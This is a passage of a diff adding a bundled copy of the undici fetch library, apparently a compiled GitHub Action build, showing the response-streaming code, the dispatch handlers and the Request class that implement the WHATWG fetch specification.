to + // highWaterMark, and sizeAlgorithm set to sizeAlgorithm. + if (!ReadableStream) { + ReadableStream = (__nccwpck_require__(5356).ReadableStream) + } + + const stream = new ReadableStream( + { + async start (controller) { + fetchParams.controller.controller = controller + }, + async pull (controller) { + await pullAlgorithm(controller) + }, + async cancel (reason) { + await cancelAlgorithm(reason) + } + }, + { + highWaterMark: 0, + size () { + return 1 + } + } + ) + + // 17. Run these steps, but abort when the ongoing fetch is terminated: + + // 1. Set response’s body to a new body whose stream is stream. + response.body = { stream } + + // 2. If response is not a network error and request’s cache mode is + // not "no-store", then update response in httpCache for request. + // TODO + + // 3. If includeCredentials is true and the user agent is not configured + // to block cookies for request (see section 7 of [COOKIES]), then run the + // "set-cookie-string" parsing algorithm (see section 5.2 of [COOKIES]) on + // the value of each header whose name is a byte-case-insensitive match for + // `Set-Cookie` in response’s header list, if any, and request’s current URL. + // TODO + + // 18. If aborted, then: + // TODO + + // 19. Run these steps in parallel: + + // 1. Run these steps, but abort when fetchParams is canceled: + fetchParams.controller.on('terminated', onAborted) + fetchParams.controller.resume = async () => { + // 1. While true + while (true) { + // 1-3. See onData... + + // 4. Set bytes to the result of handling content codings given + // codings and bytes. + let bytes + let isFailure + try { + const { done, value } = await fetchParams.controller.next() + + if (isAborted(fetchParams)) { + break + } + + bytes = done ? undefined : value + } catch (err) { + if (fetchParams.controller.ended && !timingInfo.encodedBodySize) { + // zlib doesn't like empty streams. + bytes = undefined + } else { + bytes = err + + // err may be propagated from the result of calling readablestream.cancel, + // which might not be an error. https://github.com/nodejs/undici/issues/2009 + isFailure = true + } + } + + if (bytes === undefined) { + // 2. Otherwise, if the bytes transmission for response’s message + // body is done normally and stream is readable, then close + // stream, finalize response for fetchParams and response, and + // abort these in-parallel steps. + readableStreamClose(fetchParams.controller.controller) + + finalizeResponse(fetchParams, response) + + return + } + + // 5. Increase timingInfo’s decoded body size by bytes’s length. + timingInfo.decodedBodySize += bytes?.byteLength ?? 0 + + // 6. If bytes is failure, then terminate fetchParams’s controller. + if (isFailure) { + fetchParams.controller.terminate(bytes) + return + } + + // 7. Enqueue a Uint8Array wrapping an ArrayBuffer containing bytes + // into stream. + fetchParams.controller.controller.enqueue(new Uint8Array(bytes)) + + // 8. If stream is errored, then terminate the ongoing fetch. + if (isErrored(stream)) { + fetchParams.controller.terminate() + return + } + + // 9. If stream doesn’t need more data ask the user agent to suspend + // the ongoing fetch. + if (!fetchParams.controller.controller.desiredSize) { + return + } + } + } + + // 2. If aborted, then: + function onAborted (reason) { + // 2. If fetchParams is aborted, then: + if (isAborted(fetchParams)) { + // 1. Set response’s aborted flag. + response.aborted = true + + // 2. If stream is readable, then error stream with the result of + // deserialize a serialized abort reason given fetchParams’s + // controller’s serialized abort reason and an + // implementation-defined realm. + if (isReadable(stream)) { + fetchParams.controller.controller.error( + fetchParams.controller.serializedAbortReason + ) + } + } else { + // 3. Otherwise, if stream is readable, error stream with a TypeError. + if (isReadable(stream)) { + fetchParams.controller.controller.error(new TypeError('terminated', { + cause: isErrorLike(reason) ? reason : undefined + })) + } + } + + // 4. If connection uses HTTP/2, then transmit an RST_STREAM frame. + // 5. Otherwise, the user agent should close connection unless it would be bad for performance to do so. + fetchParams.controller.connection.destroy() + } + + // 20. Return response. + return response + + async function dispatch ({ body }) { + const url = requestCurrentURL(request) + /** @type {import('../..').Agent} */ + const agent = fetchParams.controller.dispatcher + + return new Promise((resolve, reject) => agent.dispatch( + { + path: url.pathname + url.search, + origin: url.origin, + method: request.method, + body: fetchParams.controller.dispatcher.isMockActive ? request.body && (request.body.source || request.body.stream) : body, + headers: request.headersList.entries, + maxRedirections: 0, + upgrade: request.mode === 'websocket' ? 'websocket' : undefined + }, + { + body: null, + abort: null, + + onConnect (abort) { + // TODO (fix): Do we need connection here? + const { connection } = fetchParams.controller + + if (connection.destroyed) { + abort(new DOMException('The operation was aborted.', 'AbortError')) + } else { + fetchParams.controller.on('terminated', abort) + this.abort = connection.abort = abort + } + }, + + onHeaders (status, headersList, resume, statusText) { + if (status < 200) { + return + } + + let codings = [] + let location = '' + + const headers = new Headers() + + // For H2, the headers are a plain JS object + // We distinguish between them and iterate accordingly + if (Array.isArray(headersList)) { + for (let n = 0; n < headersList.length; n += 2) { + const key = headersList[n + 0].toString('latin1') + const val = headersList[n + 1].toString('latin1') + if (key.toLowerCase() === 'content-encoding') { + // https://www.rfc-editor.org/rfc/rfc7231#section-3.1.2.1 + // "All content-coding values are case-insensitive..." + codings = val.toLowerCase().split(',').map((x) => x.trim()) + } else if (key.toLowerCase() === 'location') { + location = val + } + + headers[kHeadersList].append(key, val) + } + } else { + const keys = Object.keys(headersList) + for (const key of keys) { + const val = headersList[key] + if (key.toLowerCase() === 'content-encoding') { + // https://www.rfc-editor.org/rfc/rfc7231#section-3.1.2.1 + // "All content-coding values are case-insensitive..." + codings = val.toLowerCase().split(',').map((x) => x.trim()).reverse() + } else if (key.toLowerCase() === 'location') { + location = val + } + + headers[kHeadersList].append(key, val) + } + } + + this.body = new Readable({ read: resume }) + + const decoders = [] + + const willFollow = request.redirect === 'follow' && + location && + redirectStatusSet.has(status) + + // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Encoding + if (request.method !== 'HEAD' && request.method !== 'CONNECT' && !nullBodyStatus.includes(status) && !willFollow) { + for (const coding of codings) { + // https://www.rfc-editor.org/rfc/rfc9112.html#section-7.2 + if (coding === 'x-gzip' || coding === 'gzip') { + decoders.push(zlib.createGunzip({ + // Be less strict when decoding compressed responses, since sometimes + // servers send slightly invalid responses that are still accepted + // by common browsers. + // Always using Z_SYNC_FLUSH is what cURL does. + flush: zlib.constants.Z_SYNC_FLUSH, + finishFlush: zlib.constants.Z_SYNC_FLUSH + })) + } else if (coding === 'deflate') { + decoders.push(zlib.createInflate()) + } else if (coding === 'br') { + decoders.push(zlib.createBrotliDecompress()) + } else { + decoders.length = 0 + break + } + } + } + + resolve({ + status, + statusText, + headersList: headers[kHeadersList], + body: decoders.length + ? pipeline(this.body, ...decoders, () => { }) + : this.body.on('error', () => {}) + }) + + return true + }, + + onData (chunk) { + if (fetchParams.controller.dump) { + return + } + + // 1. If one or more bytes have been transmitted from response’s + // message body, then: + + // 1. Let bytes be the transmitted bytes. + const bytes = chunk + + // 2. Let codings be the result of extracting header list values + // given `Content-Encoding` and response’s header list. + // See pullAlgorithm. + + // 3. Increase timingInfo’s encoded body size by bytes’s length. + timingInfo.encodedBodySize += bytes.byteLength + + // 4. See pullAlgorithm... + + return this.body.push(bytes) + }, + + onComplete () { + if (this.abort) { + fetchParams.controller.off('terminated', this.abort) + } + + fetchParams.controller.ended = true + + this.body.push(null) + }, + + onError (error) { + if (this.abort) { + fetchParams.controller.off('terminated', this.abort) + } + + this.body?.destroy(error) + + fetchParams.controller.terminate(error) + + reject(error) + }, + + onUpgrade (status, headersList, socket) { + if (status !== 101) { + return + } + + const headers = new Headers() + + for (let n = 0; n < headersList.length; n += 2) { + const key = headersList[n + 0].toString('latin1') + const val = headersList[n + 1].toString('latin1') + + headers[kHeadersList].append(key, val) + } + + resolve({ + status, + statusText: STATUS_CODES[status], + headersList: headers[kHeadersList], + socket + }) + + return true + } + } + )) + } +} + +module.exports = { + fetch, + Fetch, + fetching, + finalizeAndReportTiming +} + + +/***/ }), + +/***/ 8359: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +/* globals AbortController */ + + + +const { extractBody, mixinBody, cloneBody } = __nccwpck_require__(1472) +const { Headers, fill: fillHeaders, HeadersList } = __nccwpck_require__(554) +const { FinalizationRegistry } = __nccwpck_require__(6436)() +const util = __nccwpck_require__(3983) +const { + isValidHTTPToken, + sameOrigin, + normalizeMethod, + makePolicyContainer, + normalizeMethodRecord +} = __nccwpck_require__(2538) +const { + forbiddenMethodsSet, + corsSafeListedMethodsSet, + referrerPolicy, + requestRedirect, + requestMode, + requestCredentials, + requestCache, + requestDuplex +} = __nccwpck_require__(1037) +const { kEnumerableProperty } = util +const { kHeaders, kSignal, kState, kGuard, kRealm } = __nccwpck_require__(5861) +const { webidl } = __nccwpck_require__(1744) +const { getGlobalOrigin } = __nccwpck_require__(1246) +const { URLSerializer } = __nccwpck_require__(685) +const { kHeadersList, kConstruct } = __nccwpck_require__(2785) +const assert = __nccwpck_require__(9491) +const { getMaxListeners, setMaxListeners, getEventListeners, defaultMaxListeners } = __nccwpck_require__(2361) + +let TransformStream = globalThis.TransformStream + +const kAbortController = Symbol('abortController') + +const requestFinalizer = new FinalizationRegistry(({ signal, abort }) => { + signal.removeEventListener('abort', abort) +}) + +// https://fetch.spec.whatwg.org/#request-class +class Request { + // https://fetch.spec.whatwg.org/#dom-request + constructor (input, init = {}) { + if (input === kConstruct) { + return + } + + webidl.argumentLengthCheck(arguments, 1, { header: 'Request constructor' }) + + input = webidl.converters.RequestInfo(input) + init = webidl.converters.RequestInit(init) + + // https://html.spec.whatwg.org/multipage/webappapis.html#environment-settings-object + this[kRealm] = { + settingsObject: { + baseUrl: getGlobalOrigin(), + get origin () { + return this.baseUrl?.origin + }, + policyContainer: makePolicyContainer() + } + } + + // 1. Let request be null. + let request = null + + // 2. Let fallbackMode be null. + let fallbackMode = null + + // 3. Let baseURL be this’s relevant settings object’s API base URL. + const baseUrl = this[kRealm].settingsObject.baseUrl + + // 4. Let signal be null. + let signal = null + + // 5. If input is a string, then: + if (typeof input === 'string') { + // 1. Let parsedURL be the result of parsing input with baseURL. + // 2. If parsedURL is failure, then throw a TypeError. + let parsedURL + try { + parsedURL = new URL(input, baseUrl) + } catch (err) { + throw new TypeError('Failed to parse URL from ' + input, { cause: err }) + } + + // 3. If parsedURL includes credentials, then throw a TypeError. + if (parsedURL.username || parsedURL.password) { + throw new TypeError( + 'Request cannot be constructed from a URL that includes credentials: ' + + input + ) + } + + // 4. Set request to a new request whose URL is parsedURL. + request = makeRequest({ urlList: [parsedURL] }) + + // 5. Set fallbackMode to "cors". + fallbackMode = 'cors' + } else { + // 6. Otherwise: + + // 7. Assert: input is a Request object. + assert(input instanceof Request) + + // 8. Set request to input’s request. + request = input[kState] + + // 9. Set signal to input’s signal. + signal = input[kSignal] + } + + // 7. Let origin be this’s relevant settings object’s origin. + const origin = this[kRealm].settingsObject.origin + + // 8. Let window be "client". + let window = 'client' + + // 9. If request’s window is an environment settings object and its origin + // is same origin with origin, then set window to request’s window. + if ( + request.window?.constructor?.name === 'EnvironmentSettingsObject' && + sameOrigin(request.window, origin) + ) { + window = request.window + } + + // 10. If init["window"] exists and is non-null, then throw a TypeError. + if (init.window != null) { + throw new TypeError(`'window' option '${window}' must be null`) + } + + // 11. If init["window"] exists, then set window to "no-window". + if ('window' in init) { + window = 'no-window' + } + + // 12. Set request to a new request with the following properties: + request = makeRequest({ + // URL request’s URL. + // undici implementation note: this is set as the first item in request's urlList in makeRequest + // method request’s method. + method: request.method, + // header list A copy of request’s header list. + // undici implementation note: headersList is cloned in makeRequest + headersList: request.headersList, + // unsafe-request flag Set. + unsafeRequest: request.unsafeRequest, + // client This’s relevant settings object. + client: this[kRealm].settingsObject, + // window window. + window, + // priority request’s priority. + priority: request.priority, + // origin request’s origin. The propagation of the origin is only significant for navigation requests + // being handled by a service worker. In this scenario a request can have an origin that is different + // from the current client. + origin: request.origin, + // referrer request’s referrer. + referrer: request.referrer, + // referrer policy request’s referrer policy. + referrerPolicy: request.referrerPolicy, + // mode request’s mode. + mode: request.mode, + // credentials mode request’s credentials mode. + credentials: request.credentials, + // cache mode request’s cache mode. + cache: request.cache, + // redirect mode request’s redirect mode. + redirect: request.redirect, + // integrity metadata request’s integrity metadata. + integrity: request.integrity, + // keepalive request’s keepalive. + keepalive: request.keepalive, + // reload-navigation flag request’s reload-navigation flag. + reloadNavigation: request.reloadNavigation, + // history-navigation flag request’s history-navigation flag. + historyNavigation: request.historyNavigation, + // URL list A clone of request’s URL list. + urlList: [...request.urlList] + }) + + const initHasKey = Object.keys(init).length !== 0 + + // 13. If init is not empty, then: + if (initHasKey) { + // 1. If request’s mode is "navigate", then set it to "same-origin". + if (request.mode === 'navigate') { + request.mode = 'same-origin' + } + + // 2. Unset request’s reload-navigation flag. + request.reloadNavigation = false + + // 3. Unset request’s history-navigation flag. + request.historyNavigation = false + + // 4. Set request’s origin to "client". + request.origin = 'client' + + // 5. Set request’s referrer to "client" + request.referrer = 'client' + + // 6. Set request’s referrer policy to the empty string. + request.referrerPolicy = '' + + // 7. Set request’s URL to request’s current URL. + request.url = request.urlList[request.urlList.length - 1] + + // 8. Set request’s URL list to « request’s URL ». + request.urlList = [request.url] + } + + // 14. If init["referrer"] exists, then: + if (init.referrer !== undefined) { + // 1. Let referrer be init["referrer"]. + const referrer = init.referrer + + // 2. If referrer is the empty string, then set request’s referrer to "no-referrer". + if (referrer === '') { + request.referrer = 'no-referrer' + } else { + // 1. Let parsedReferrer be the result of parsing referrer with + // baseURL. + // 2. If parsedReferrer is failure, then throw a TypeError. + let parsedReferrer + try { + parsedReferrer = new URL(referrer, baseUrl) + } catch (err) { + throw new TypeError(`Referrer "${referrer}" is not a valid URL.`, { cause: err }) + } + + // 3. If one of the following is true + // - parsedReferrer’s scheme is "about" and path is the string "client" + // - parsedReferrer’s origin is not same origin with origin + // then set request’s referrer to "client". + if ( + (parsedReferrer.protocol === 'about:' && parsedReferrer.hostname === 'client') || + (origin && !sameOrigin(parsedReferrer, this[kRealm].settingsObject.baseUrl)) + ) { + request.referrer = 'client' + } else { + // 4. Otherwise, set request’s referrer to parsedReferrer. + request.referrer = parsedReferrer + } + } + } + + // 15. If init["referrerPolicy"] exists, then set request’s referrer policy + // to it. + if (init.referrerPolicy !== undefined) { + request.referrerPolicy = init.referrerPolicy + } + + // 16. Let mode be init["mode"] if it exists, and fallbackMode otherwise. + let mode + if (init.mode !== undefined) { + mode = init.mode + } else { + mode = fallbackMode + } + + // 17. If mode is "navigate", then throw a TypeError. + if (mode === 'navigate') { + throw webidl.errors.exception({ + header: 'Request constructor', + message: 'invalid request mode navigate.' + }) + } + + // 18. If mode is non-null, set request’s mode to mode. + if (mode != null) { + request.mode = mode + } + + // 19. If init["credentials"] exists, then set request’s credentials mode + // to it. + if (init.credentials !== undefined) { + request.credentials = init.credentials + } + + // 18. If init["cache"] exists, then set request’s cache mode to it. + if (init.cache !== undefined) { + request.cache = init.cache + } + + // 21. If request’s cache mode is "only-if-cached" and request’s mode is + // not "same-origin", then throw a TypeError. + if (request.cache === 'only-if-cached' && request.mode !== 'same-origin') { + throw new TypeError( + "'only-if-cached' can be set only with 'same-origin' mode" + ) + } + + // 22. If init["redirect"] exists, then set request’s redirect mode to it. + if (init.redirect !== undefined) { + request.redirect = init.redirect + } + + // 23. If init["integrity"] exists, then set request’s integrity metadata to it. + if (init.integrity != null) { + request.integrity = String(init.integrity) + } + + // 24. If init["keepalive"] exists, then set request’s keepalive to it. + if (init.keepalive !== undefined) { + request.keepalive = Boolean(init.keepalive) + } + + // 25. If init["method"] exists, then: + if (init.method !== undefined) { + // 1. Let method be init["method"]. + let method = init.method + + // 2. If method is not a method or method is a forbidden method, then + // throw a TypeError. + if (!isValidHTTPToken(method)) { + throw new TypeError(`'${method}' is not a valid HTTP method.`) + } + + if (forbiddenMethodsSet.has(method.toUpperCase())) { + throw new TypeError(`'${method}' HTTP method is unsupported.`) + } + + // 3. Normalize method. + method = normalizeMethodRecord[method] ?? normalizeMethod(method) + + // 4. Set request’s method to method. + request.method = method + } + + // 26. If init["signal"] exists, then set signal to it. + if (init.signal !== undefined) { + signal = init.signal + } + + // 27. Set this’s request to request. + this[kState] = request + + // 28. Set this’s signal to a new AbortSignal object with this’s relevant + // Realm. + // TODO: could this be simplified with AbortSignal.any + // (https://dom.spec.whatwg.org/#dom-abortsignal-any) + const ac = new AbortController() + this[kSignal] = ac.signal + this[kSignal][kRealm] = this[kRealm] + + // 29. If signal is not null, then make this’s signal follow signal. + if (signal != null) { + if ( + !signal || + typeof signal.aborted !== 'boolean' || + typeof signal.addEventListener !== 'function' + ) { + throw new TypeError( + "Failed to construct 'Request': member signal is not of type AbortSignal." + ) + } + + if (signal.aborted) { + ac.abort(signal.reason) + } else { + // Keep a strong ref to ac while request object + // is alive. This is needed to prevent AbortController + // from being prematurely garbage collected. + // See, https://github.com/nodejs/undici/issues/1926. + this[kAbortController] = ac + + const acRef = new WeakRef(ac) + const abort = function () { + const ac = acRef.deref() + if (ac !== undefined) { + ac.abort(this.reason) + } + } + + // Third-party AbortControllers may not work with these. + // See, https://github.com/nodejs/undici/pull/1910#issuecomment-1464495619. + try { + // If the max amount of listeners is equal to the default, increase it + // This is only available in node >= v19.9.0 + if (typeof getMaxListeners === 'function' && getMaxListeners(signal) === defaultMaxListeners) { + setMaxListeners(100, signal) + } else if (getEventListeners(signal, 'abort').length >= defaultMaxListeners) { + setMaxListeners(100, signal) + } + } catch {} + + util.addAbortListener(signal, abort) + requestFinalizer.register(ac, { signal, abort }) + } + } + + // 30. Set this’s headers to a new Headers object with this’s relevant + // Realm, whose header list is request’s header list and guard is + // "request". + this[kHeaders] = new Headers(kConstruct) + this[kHeaders][kHeadersList] = request.headersList + this[kHeaders][kGuard] = 'request' + this[kHeaders][kRealm] = this[kRealm] + + // 31. If this’s request’s mode is "no-cors", then: + if (mode === 'no-cors') { + // 1. If this’s request’s method is not a CORS-safelisted method, + // then throw a TypeError. + if (!corsSafeListedMethodsSet.has(request.method)) { + throw new TypeError( + `'${request.method} is unsupported in no-cors mode.` + ) + } + + // 2. Set this’s headers’s guard to "request-no-cors". + this[kHeaders][kGuard] = 'request-no-cors' + } + + // 32. If init is not empty, then: + if (initHasKey) { + /** @type {HeadersList} */ + const headersList = this[kHeaders][kHeadersList] + // 1. Let headers be a copy of this’s headers and its associated header + // list. + // 2. If init["headers"] exists, then set headers to init["headers"]. + const headers = init.headers !== undefined ? init.headers : new HeadersList(headersList) + + // 3. Empty this’s headers’s header list. + headersList.clear() + + // 4. If headers is a Headers object, then for each header in its header + // list, append header’s name/header’s value to this’s headers. + if (headers instanceof HeadersList) { + for (const [key, val] of headers) { + headersList.append(key, val) + } + // Note: Copy the `set-cookie` meta-data. + headersList.cookies = headers.cookies + } else { + // 5. Otherwise, fill this’s headers with headers. + fillHeaders(this[kHeaders], headers) + } + } + + // 33. Let inputBody be input’s request’s body if input is a Request + // object; otherwise null. + const inputBody = input instanceof Request ? input[kState].body : null + + // 34. If either init["body"] exists and is non-null or inputBody is + // non-null, and request’s method is `GET` or `HEAD`, then throw a + // TypeError. + if ( + (init.body != null || inputBody != null) && + (request.method === 'GET' || request.method === 'HEAD') + ) { + throw new TypeError('Request with GET/HEAD method cannot have body.') + } + + // 35. Let initBody be null. + let initBody = null + + // 36. If init["body"] exists and is non-null, then: + if (init.body != null) { + // 1. Let Content-Type be null. + // 2. Set initBody and Content-Type to the result of extracting + // init["body"], with keepalive set to request’s keepalive. + const [extractedBody, contentType] = extractBody( + init.body, + request.keepalive + ) + initBody = extractedBody + + // 3, If Content-Type is non-null and this’s headers’s header list does + // not contain `Content-Type`, then append `Content-Type`/Content-Type to + // this’s headers. + if (contentType && !this[kHeaders][kHeadersList].contains('content-type')) { + this[kHeaders].append('content-type', contentType) + } + } + + // 37. Let inputOrInitBody be initBody if it is non-null; otherwise + // inputBody. + const inputOrInitBody = initBody ?? inputBody + + // 38. If inputOrInitBody is non-null and inputOrInitBody’s source is + // null, then: + if (inputOrInitBody != null && inputOrInitBody.source == null) { + // 1. If initBody is non-null and init["duplex"] does not exist, + // then throw a TypeError. + if (initBody != null && init.duplex == null) { + throw new TypeError('RequestInit: duplex option is required when sending a body.') + } + + // 2. If this’s request’s mode is neither "same-origin" nor "cors", + // then throw a TypeError. + if (request.mode !== 'same-origin' && request.mode !== 'cors') { + throw new TypeError( + 'If request is made from ReadableStream, mode should be "same-origin" or "cors"' + ) + } + + // 3. Set this’s request’s use-CORS-preflight flag. + request.useCORSPreflightFlag = true + } + + // 39. Let finalBody be inputOrInitBody. + let finalBody = inputOrInitBody + + // 40. If initBody is null and inputBody is non-null, then: + if (initBody == null && inputBody != null) { + // 1. If input is unusable, then throw a TypeError. + if (util.isDisturbed(inputBody.stream) || inputBody.stream.locked) { + throw new TypeError( + 'Cannot construct a Request with a Request object that has already been used.' + ) + } + + // 2. Set finalBody to the result of creating a proxy for inputBody. + if (!TransformStream) { + TransformStream = (__nccwpck_require__(5356).TransformStream) + } + + // https://streams.spec.whatwg.org/#readablestream-create-a-proxy + const identityTransform = new TransformStream() + inputBody.stream.pipeThrough(identityTransform) + finalBody = { + source: inputBody.source, + length: inputBody.length, + stream: identityTransform.readable + } + } + + // 41. Set this’s request’s body to finalBody. + this[kState].body = finalBody + } + + // Returns request’s HTTP method, which is "GET" by default. + get method () { + webidl.brandCheck(this, Request) + + // The method getter steps are to return this’s request’s method. + return this[kState].method + } + + // Returns the URL of request as a string. + get url () { + webidl.brandCheck(this, Request) + + // The url getter steps are to return this’s request’s URL, serialized. + return URLSerializer(this[kState].url) + } + + // Returns a Headers object consisting of the headers associated with request. + // Note that headers added in the network layer by the user agent will not + // be accounted for in this object, e.g., the "Host" header. + get headers () { + webidl.brandCheck(this, Request) + + // The headers getter steps are to return this’s headers. + return this[kHeaders] + } + + // Returns the kind of resource requested by request, e.g., "document" + // or "script". + get destination () { + webidl.brandCheck(this, Request) + + // The destination getter are to return this’s request’s destination. + return this[kState].destination + } + + // Returns the referrer of request. Its value can be a same-origin URL if + // explicitly set in init, the empty string to indicate no referrer, and + // "about:client" when defaulting to the global’s default. This is used + // during fetching to determine the value of the `Referer` header of the + // request being made. + get referrer () { + webidl.brandCheck(this, Request) + + // 1. If this’s request’s referrer is "no-referrer", then return the + // empty string. + if (this[kState].referrer === 'no-referrer') { + return '' + } + + // 2. If this’s request’s referrer is "client", then return + // "about:client". + if (this[kState].referrer === 'client') { + return 'about:client' + } + + // Return this’s request’s referrer, serialized. + return this[kState].referrer.toString() + } + + // Returns the referrer policy associated with request. + // This is used during fetching to compute the value of the request’s + // referrer. + get referrerPolicy () { + webidl.brandCheck(this, Request) + + // The referrerPolicy getter steps are to return this’s request’s referrer policy. + return this[kState].referrerPolicy + } + + // Returns the mode associated with request, which is a string indicating + // whether the request will use CORS, or will be restricted to same-origin + // URLs. + get mode () { + webidl.brandCheck(this, Request) + + // The mode getter steps are to return this’s request’s mode. + return this[kState].mode + } + + // Returns the credentials mode associated with request, + // which is a string indicating whether credentials will be sent with the + // request always, never, or only when sent to a same-origin URL. + get credentials () { + // The credentials getter steps are to return this’s request’s credentials mode. + return this[kState].credentials + } + + // Returns the cache mode associated with request, + // which is a string indicating how the request will + // interact with the browser’s cache when fetching. + get cache () { + webidl.brandCheck(this, Request) + + // The cache getter steps are to return this’s request’s cache mode. + return this[kState].cache + } + + // Returns the redirect mode associated with request, + // which is a string indicating how redirects for the + // request will be handled during fetching. A request + // will follow redirects by default. + get redirect () { + webidl.brandCheck(this, Request) + + // The redirect getter steps are to return this’s request’s redirect mode. + return this[kState].redirect + } + + // Returns request’s subresource integrity metadata, which is a + // cryptographic hash of the resource being fetched. Its value + // consists of multiple hashes separated by whitespace. [SRI] + get integrity () { + webidl.brandCheck(this, Request) + + // The integrity getter steps are to return this’s request’s integrity + // metadata. + return this[kState].integrity + } + + // Returns a boolean indicating whether or not request can outlive the + // global in which it was created. + get keepalive () { + webidl.brandCheck(this, Request) + + // The keepalive getter steps are to return this’s request’s keepalive. + return this[kState].keepalive + } + + // Returns a boolean indicating whether or not request is for a reload + // navigation. + get isReloadNavigation () { + webidl.brandCheck(this, Request) + + // The isReloadNavigation getter steps are to return true if this’s + // request’s reload-navigation flag is set; otherwise false. + return this[kState].reloadNavigation + } + + // Returns a boolean indicating whether or not request is for a history + // navigation (a.k.a. back-foward navigation). + get isHistoryNavigation () { + webidl.brandCheck(this, Request) + + // The isHistoryNavigation getter steps are to return true if this’s request’s + // history-navigation flag is set; otherwise false. + return this[kState].historyNavigation + } + + // Returns the signal associated with request, which is an AbortSignal + // object indicating whether or not request has been aborted, and its + // abort event handler. + get signal () { + webidl.brandCheck(this, Request) + + // The signal getter steps are to return this’s signal. + return this[kSignal] + } + + get body () { + webidl.brandCheck(this, Request) + + return this[kState].body ? this[kState].body.stream : null + } + + get bodyUsed () { + webidl.brandCheck(this, Request) + + return !!this[kState].body && util.isDisturbed(this[kState].body.stream) + } + + get duplex () { + webidl.brandCheck(this, Request) + + return 'half' + } + + // Returns a clone of request. + clone () { + webidl.brandCheck(this, Request) + + // 1. If this is unusable, then throw a TypeError. + if (this.bodyUsed || this.body?.locked) { + throw new TypeError('unusable') + } + + // 2. Let clonedRequest be the result of cloning this’s request. + const clonedRequest = cloneRequest(this[kState]) + + // 3. Let clonedRequestObject be the result of creating a Request object, + // given clonedRequest, this’s headers’s guard, and this’s relevant Realm. + const clonedRequestObject = new Request(kConstruct) + clonedRequestObject[kState] = clonedRequest + clonedRequestObject[kRealm] = this[kRealm] + clonedRequestObject[kHeaders] = new Headers(kConstruct) + clonedRequestObject[kHeaders][kHeadersList] = clonedRequest.headersList + clonedRequestObject[kHeaders][kGuard] = this[kHeaders][kGuard] + clonedRequestObject[kHeaders][kRealm] = this[kHeaders][kRealm] + + // 4. Make clonedRequestObject’s signal follow this’s signal. + const ac = new AbortController() + if (this.signal.aborted) { + ac.abort(this.signal.reason) + } else { + util.addAbortListener( + this.signal, + () => { + ac.abort(this.signal.reason) + } + ) + } + clonedRequestObject[kSignal] = ac.signal + + // 4. Return clonedRequestObject. + return clonedRequestObject + } +} + +mixinBody(Request) + +function makeRequest (init) { + // https://fetch.spec.whatwg.org/#requests + const request = { + method: 'GET', + localURLsOnly: false, + unsafeRequest: false, + body: null, + client: null, + reservedClient: null, + replacesClientId: '', + window: 'client', + keepalive: false, + serviceWorkers: 'all', + initiator: '', + destination: '', + priority: null, + origin: 'client', + policyContainer: 'client', + referrer: 'client', + referrerPolicy: '', + mode: 'no-cors', + useCORSPreflightFlag: false, + credentials: 'same-origin', + useCredentials: false, + cache: 'default', + redirect: 'follow', + integrity: '', + cryptoGraphicsNonceMetadata: '', + parserMetadata: '', + reloadNavigation: false, + historyNavigation: false, + userActivation: false, + taintedOrigin: false, + redirectCount: 0, + responseTainting: 'basic', + preventNoCacheCacheControlHeaderModification: false, + done: false, + timingAllowFailed: false, + ...init, + headersList: init.headersList + ? new HeadersList(init.headersList) + : new HeadersList() + } + request.url = request.urlList[0] + return request +} + +// https://fetch.spec.whatwg.org/#concept-request-clone +function cloneRequest (request) { + // To clone a request request, run these steps: + + // 1. Let newRequest be a copy of request, except for its body. + const newRequest = makeRequest({ ...request, body: null }) + + // 2. If request’s body is non-null, set newRequest’s body to the + // result of cloning request’s body. + if (request.body != null) { + newRequest.body = cloneBody(request.body) + } + + // 3. Return newRequest. + return newRequest +} + +Object.defineProperties(Request.prototype, { + method: kEnumerableProperty, + url: kEnumerableProperty, + headers: kEnumerableProperty, + redirect: kEnumerableProperty, + clone: kEnumerableProperty, + signal: kEnumerableProperty, + duplex: kEnumerableProperty, + destination: kEnumerableProperty, + body: kEnumerableProperty, + bodyUsed: kEnumerableProperty, + isHistoryNavigation: kEnumerableProperty, + isReloadNavigation: kEnumerableProperty, + keepalive: kEnumerableProperty, + integrity: kEnumerableProperty, + cache: kEnumerableProperty, + credentials: kEnumerableProperty, + attribute: kEnumerableProperty, + referrerPolicy: kEnumerableProperty, + referrer: kEnumerableProperty, + mode: kEnumerableProperty, + [Symbol.toStringTag]: { + value: 'Request', + configurable: true + } +}) + +webidl.converters.Request = webidl.interfaceConverter( + Request +) + +// https://fetch.spec.whatwg.org/#requestinfo +webidl.converters.RequestInfo = function (V) { + if (typeof V === 'string') { + return webidl.converters.USVString(V) + } + + if (V instanceof Request) { + return webidl.converters.Request(V) + } + + return webidl.converters.USVString(V) +} + +webidl.converters.AbortSignal = webidl.interfaceConverter( + AbortSignal +) + +// https://fetch.spec.whatwg.org/#requestinit +webidl.converters.RequestInit = webidl.dictionaryConverter([ + { + key: 'method', + converter: webidl.converters.ByteString + }, + { + key: 'headers', + converter: webidl.converters.HeadersInit + }, + { + key: 'body', + converter: webidl.nullableConverter( + webidl.converters.BodyInit + ) + }, + { + key: 'referrer', + converter: webidl.converters.USVString + }, + { + key: 'referrerPolicy', + converter: webidl.converters.DOMString, + // https://w3c.github.io/webappsec-referrer-policy/#referrer-policy + allowedValues: referrerPolicy + }, + { + key: 'mode', + converter: webidl.converters.DOMString, + // https://fetch.spec.whatwg.org/#concept-request-mode + allowedValues: requestMode + }, + { + key: 'credentials', + converter: webidl.converters.DOMString, + // https://fetch.spec.whatwg.org/#requestcredentials + allowedValues: requestCredentials + }, + { + key: 'cache', + converter: webidl.converters.DOMString, + // https://fetch.spec.whatwg.org/#requestcache + allowedValues: requestCache + }, + { + key: 'redirect', + converter: webidl.converters.DOMString, + // https://fetch.spec.whatwg.org/#requestredirect + allowedValues: requestRedirect + }, + { + key: 'integrity', + converter: webidl.converters.DOMString + }, + { + key: 'keepalive', + converter: webidl.converters.boolean + }, + { + key: 'signal', + converter: webidl.nullableConverter( + (signal) => webidl.converters.AbortSignal( + signal, + { strict: false } + ) + ) + }, + { + key: 'window', + converter: webidl.converters.any + }, + { + key: 'duplex', + converter: webidl.converters.DOMString, + allowedValues: requestDuplex + } +]) + +module.exports = { Request, makeRequest } + + +/***/ }), + +/***/ 7823: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { Headers, HeadersList, fill } = __nccwpck_require__(554) +const { extractBody, cloneBody, mixinBody } = __nccwpck_require__(1472) +const util = __nccwpck_require__(3983) +const { kEnumerableProperty } = util +const { + 